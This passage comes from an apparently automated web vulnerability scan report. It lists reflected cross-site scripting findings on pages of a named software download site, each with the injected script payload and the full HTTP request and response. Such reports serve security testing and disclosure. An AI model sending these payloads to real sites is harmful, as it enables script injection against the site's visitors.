HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:45:57 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:56:10 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-par-downloads.htmld0759"><script>alert(1)</script>6fd3ce475e7" /> ...[SNIP]...
1.97. http://www.x64bitdownload.com/64-bit-par-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-par-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c878"><script>alert(1)</script>7559f64c803 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-par-downloads.html?8c878"><script>alert(1)</script>7559f64c803=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:41:45 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:45 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 64784
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-par-downloads.html?8c878"><script>alert(1)</script>7559f64c803=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7970"><script>alert(1)</script>88378e0e2f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-podcast-downloads.htmld7970"><script>alert(1)</script>88378e0e2f5 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:56:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:06:59 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91550
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-podcast-downloads.htmld7970"><script>alert(1)</script>88378e0e2f5" /> ...[SNIP]...
1.99. http://www.x64bitdownload.com/64-bit-podcast-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-podcast-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4622"><script>alert(1)</script>bdc4521abda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-podcast-downloads.html?a4622"><script>alert(1)</script>bdc4521abda=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:48 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:55 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-podcast-downloads.html?a4622"><script>alert(1)</script>bdc4521abda=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96b2e"><script>alert(1)</script>6e0959531ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rar-downloads.html96b2e"><script>alert(1)</script>6e0959531ff HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:46:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:56:17 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rar-downloads.html96b2e"><script>alert(1)</script>6e0959531ff" /> ...[SNIP]...
1.101. http://www.x64bitdownload.com/64-bit-rar-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-rar-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e87e"><script>alert(1)</script>7391c84ac49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rar-downloads.html?7e87e"><script>alert(1)</script>7391c84ac49=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:42:11 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:53:01 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rar-downloads.html?7e87e"><script>alert(1)</script>7391c84ac49=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf657"><script>alert(1)</script>ba7bde42ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-reader-c-44-newsgroup-clients-downloads.htmlcf657"><script>alert(1)</script>ba7bde42ab HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:39:09 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:49:14 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-reader-c-44-newsgroup-clients-downloads.htmlcf657"><script>alert(1)</script>ba7bde42ab" /> ...[SNIP]...
1.103. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce3f"><script>alert(1)</script>fad1e3471a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-reader-c-44-newsgroup-clients-downloads.html?2ce3f"><script>alert(1)</script>fad1e3471a2=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:09 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:46:13 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-reader-c-44-newsgroup-clients-downloads.html?2ce3f"><script>alert(1)</script>fad1e3471a2=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc2d"><script>alert(1)</script>fcd3dfde6f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-reader-downloads.htmlebc2d"><script>alert(1)</script>fcd3dfde6f3 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:50:15 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98249
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-reader-downloads.htmlebc2d"><script>alert(1)</script>fcd3dfde6f3" /> ...[SNIP]...
1.105. http://www.x64bitdownload.com/64-bit-reader-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-reader-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14914"><script>alert(1)</script>113a0fba4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-reader-downloads.html?14914"><script>alert(1)</script>113a0fba4f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:42 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:46:50 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98251
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-reader-downloads.html?14914"><script>alert(1)</script>113a0fba4f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cf3"><script>alert(1)</script>15bec155853 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-reading-downloads.html32cf3"><script>alert(1)</script>15bec155853 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:59:40 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:09:49 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-reading-downloads.html32cf3"><script>alert(1)</script>15bec155853" /> ...[SNIP]...
1.107. http://www.x64bitdownload.com/64-bit-reading-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-reading-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f20"><script>alert(1)</script>c2ca189390f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-reading-downloads.html?a0f20"><script>alert(1)</script>c2ca189390f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:56:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:06:51 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-reading-downloads.html?a0f20"><script>alert(1)</script>c2ca189390f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff5d"><script>alert(1)</script>01c8f498ee9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-c-44-newsgroup-clients-downloads.htmlfff5d"><script>alert(1)</script>01c8f498ee9 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:45 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:49:04 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 30708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-c-44-newsgroup-clients-downloads.htmlfff5d"><script>alert(1)</script>01c8f498ee9" /> ...[SNIP]...
1.109. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-rss-c-44-newsgroup-clients-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a440d"><script>alert(1)</script>265b1c4833d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-c-44-newsgroup-clients-downloads.html?a440d"><script>alert(1)</script>265b1c4833d=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:35:17 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:45:23 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 30711
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-c-44-newsgroup-clients-downloads.html?a440d"><script>alert(1)</script>265b1c4833d=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1c3"><script>alert(1)</script>79bc88e940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-client-downloads.html6f1c3"><script>alert(1)</script>79bc88e940 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:55:46 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:06:16 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-client-downloads.html6f1c3"><script>alert(1)</script>79bc88e940" /> ...[SNIP]...
1.111. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-rss-client-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3709f"><script>alert(1)</script>5d317c2536e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-client-downloads.html?3709f"><script>alert(1)</script>5d317c2536e=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:22 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:49 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-client-downloads.html?3709f"><script>alert(1)</script>5d317c2536e=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d337e"><script>alert(1)</script>9b144cad06d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-downloads.htmld337e"><script>alert(1)</script>9b144cad06d HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
